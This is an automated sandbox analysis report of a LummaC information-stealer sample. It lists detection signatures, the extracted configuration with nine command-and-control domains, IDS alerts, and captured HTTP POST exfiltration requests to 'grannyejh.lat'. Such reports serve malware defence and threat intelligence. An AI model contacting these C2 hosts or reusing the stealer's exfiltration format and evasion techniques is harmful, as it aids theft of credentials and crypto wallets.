Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pPizCGDvrx.exe

Overview

General Information

Sample name:pPizCGDvrx.exe
renamed because original name is a hash value
Original sample name:604fc7ac851c76b3ade50108357d8134.exe
Analysis ID:1577892
MD5:604fc7ac851c76b3ade50108357d8134
SHA1:e8e5229df293646aed1a46d5a7d7983eb1f2eb47
SHA256:a16f254d7b7ede78b181d541cf02de244472f59f18ea3c8e6ef63d869736cb93
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • pPizCGDvrx.exe (PID: 7392 cmdline: "C:\Users\user\Desktop\pPizCGDvrx.exe" MD5: 604FC7AC851C76B3ADE50108357D8134)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["energyaffai.lat", "aspecteirs.lat", "rapeflowwj.lat", "discokeyus.lat", "necklacebudi.lat", "sweepyribs.lat", "sustainskelet.lat", "grannyejh.lat", "crosshuaht.lat"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1600613999.00000000011B1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1603193401.000000000115A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1603110801.0000000001158000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: pPizCGDvrx.exe PID: 7392JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
              Process Memory Space: pPizCGDvrx.exe PID: 7392JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 2 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T21:17:02.473914+010020283713Unknown Traffic192.168.2.749700172.67.179.109443TCP
                2024-12-18T21:17:06.952490+010020283713Unknown Traffic192.168.2.749702172.67.179.109443TCP
                2024-12-18T21:17:14.417710+010020283713Unknown Traffic192.168.2.749723172.67.179.109443TCP
                2024-12-18T21:17:19.368228+010020283713Unknown Traffic192.168.2.749735172.67.179.109443TCP
                2024-12-18T21:17:25.397542+010020283713Unknown Traffic192.168.2.749754172.67.179.109443TCP
                2024-12-18T21:17:30.868317+010020283713Unknown Traffic192.168.2.749765172.67.179.109443TCP
                2024-12-18T21:17:36.349023+010020283713Unknown Traffic192.168.2.749781172.67.179.109443TCP
                2024-12-18T21:17:44.738101+010020283713Unknown Traffic192.168.2.749802172.67.179.109443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T21:17:05.699877+010020546531A Network Trojan was detected192.168.2.749700172.67.179.109443TCP
                2024-12-18T21:17:12.833580+010020546531A Network Trojan was detected192.168.2.749702172.67.179.109443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T21:17:05.699877+010020498361A Network Trojan was detected192.168.2.749700172.67.179.109443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T21:17:12.833580+010020498121A Network Trojan was detected192.168.2.749702172.67.179.109443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T21:17:02.473914+010020583651Domain Observed Used for C2 Detected192.168.2.749700172.67.179.109443TCP
                2024-12-18T21:17:06.952490+010020583651Domain Observed Used for C2 Detected192.168.2.749702172.67.179.109443TCP
                2024-12-18T21:17:14.417710+010020583651Domain Observed Used for C2 Detected192.168.2.749723172.67.179.109443TCP
                2024-12-18T21:17:19.368228+010020583651Domain Observed Used for C2 Detected192.168.2.749735172.67.179.109443TCP
                2024-12-18T21:17:25.397542+010020583651Domain Observed Used for C2 Detected192.168.2.749754172.67.179.109443TCP
                2024-12-18T21:17:30.868317+010020583651Domain Observed Used for C2 Detected192.168.2.749765172.67.179.109443TCP
                2024-12-18T21:17:36.349023+010020583651Domain Observed Used for C2 Detected192.168.2.749781172.67.179.109443TCP
                2024-12-18T21:17:44.738101+010020583651Domain Observed Used for C2 Detected192.168.2.749802172.67.179.109443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T21:17:00.944390+010020583641Domain Observed Used for C2 Detected192.168.2.7646191.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T21:17:00.797972+010020583781Domain Observed Used for C2 Detected192.168.2.7647491.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T21:17:17.614166+010020480941Malware Command and Control Activity Detected192.168.2.749723172.67.179.109443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: pPizCGDvrx.exeAvira: detected
                Antivirus detection for URL or domain
                Source: https://grannyejh.lat/HAvira URL Cloud: Label: malware
                Source: https://grannyejh.lat:443/apitAAvira URL Cloud: Label: malware
                Source: https://grannyejh.lat/sAvira URL Cloud: Label: malware
                Source: https://grannyejh.lat/?Avira URL Cloud: Label: malware
                Source: https://grannyejh.lat/apiz0yAvira URL Cloud: Label: malware
                Source: https://grannyejh.lat/apigsAAvira URL Cloud: Label: malware
                Source: https://grannyejh.lat/=Avira URL Cloud: Label: malware
                Source: https://grannyejh.lat/apizAvira URL Cloud: Label: malware
                Source: https://grannyejh.lat/PAvira URL Cloud: Label: malware
                Source: https://grannyejh.lat/apiGAvira URL Cloud: Label: malware
                Source: https://grannyejh.lat/api6Avira URL Cloud: Label: malware
                Source: https://grannyejh.lat/(Avira URL Cloud: Label: malware
                Found malware configuration
                Source: pPizCGDvrx.exe.7392.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "aspecteirs.lat", "rapeflowwj.lat", "discokeyus.lat", "necklacebudi.lat", "sweepyribs.lat", "sustainskelet.lat", "grannyejh.lat", "crosshuaht.lat"], "Build id": "PsFKDg--pablo"}
                Multi AV Scanner detection for submitted file
                Source: pPizCGDvrx.exeReversingLabs: Detection: 57%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: pPizCGDvrx.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
                Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
                Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
                Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
                Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
                Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
                Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
                Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
                Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString decryptor: sweepyribs.lat
                Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString decryptor: PsFKDg--pablo
                Source: pPizCGDvrx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49754 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49765 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.7:49781 version: TLS 1.2
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeDirectory queried: number of queries: 1001

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.7:64619 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.7:64749 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.7:49723 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.7:49700 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.7:49702 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.7:49802 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.7:49754 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.7:49735 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.7:49765 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.7:49781 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49723 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49702 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49702 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 172.67.179.109:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: energyaffai.lat
                Source: Malware configuration extractorURLs: aspecteirs.lat
                Source: Malware configuration extractorURLs: rapeflowwj.lat
                Source: Malware configuration extractorURLs: discokeyus.lat
                Source: Malware configuration extractorURLs: necklacebudi.lat
                Source: Malware configuration extractorURLs: sweepyribs.lat
                Source: Malware configuration extractorURLs: sustainskelet.lat
                Source: Malware configuration extractorURLs: grannyejh.lat
                Source: Malware configuration extractorURLs: crosshuaht.lat
                Source: Joe Sandbox ViewIP Address: 172.67.179.109 172.67.179.109
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49723 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49802 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49765 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49754 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49735 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 172.67.179.109:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49781 -> 172.67.179.109:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: grannyejh.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: grannyejh.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QIX7HBIA1S9Y5Q48LYYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12850Host: grannyejh.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XGGIGRETO6JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15034Host: grannyejh.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0PD9BVQSDHL2JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20371Host: grannyejh.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2ODPF2AH7FW6GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1206Host: grannyejh.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BHT4KAL6C4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551069Host: grannyejh.lat
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
                Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: grannyejh.lat
                Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: pPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755166641.00000000011A9000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1600613999.000000000119E000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1657908110.000000000119E000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755109523.000000000119E000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1603058003.00000000011A0000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754892767.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                Source: pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                Source: pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: pPizCGDvrx.exe, pPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1658536617.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1600613999.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756651174.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1671282369.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754833970.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1603018790.00000000011C2000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756690646.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1600571554.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1657853722.00000000011C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/
                Source: pPizCGDvrx.exe, 00000000.00000003.1437659594.000000000114B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/(
                Source: pPizCGDvrx.exe, 00000000.00000003.1657853722.00000000011C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/=
                Source: pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001143000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/?
                Source: pPizCGDvrx.exe, 00000000.00000003.1547189267.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1671204983.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756690646.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1546879090.00000000011EC000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1600571554.00000000011E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/H
                Source: pPizCGDvrx.exe, 00000000.00000003.1658536617.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756651174.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1671282369.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754833970.00000000011C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/P
